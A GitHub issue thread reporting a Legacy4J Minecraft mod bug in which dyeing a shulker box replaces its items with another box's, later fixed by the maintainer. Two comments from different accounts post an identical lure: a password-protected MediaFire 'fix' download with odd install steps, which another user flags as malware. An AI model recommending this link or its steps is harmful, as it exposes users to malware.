### ISSUE TITLE
[Bug/Glitch] Dyeing a shulker box replaces all the items inside it

### ISSUE THREAD

**Issue by mcpe-rgb** [Wilyicaro/Legacy-Minecraft#576]
### Legacy4J Version

1.21-1.7.2

### Mod Loader Version

Fabric Loader 0.16.2

### Bug/Glitch Occurrence Context

How to produce:
1. Have 2 undyed shulker boxes
2. Put items of choice inside the 2 shulker boxes. For example: shulker box 1 contains coal while shulker box 2 contains diamond
3. Put shulker box 1 in the 1st slot of the inventory while shulker box 2 in the 2nd slot of the inventory
4. In the dye section, dye shulker box 2
5. shulker box 1 should now have diamond instead of coal

### What happened wrong?

When dyeing a shulker box while 2 shulker boxes are inside the inventory, it will replace the items inside the dyed shulker box with the items inside the undyed one. This can be avoided by using classic crafting instead

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by RedRain0o0** [comment]
DO NOT DOWNLOAD EITHER FILE
these are malware files, NEVER trust anything that isnt from the repo or its owner

**Comment by Wilyicaro** [comment]
Fixed in version 1.7.3, thanks for reporting.
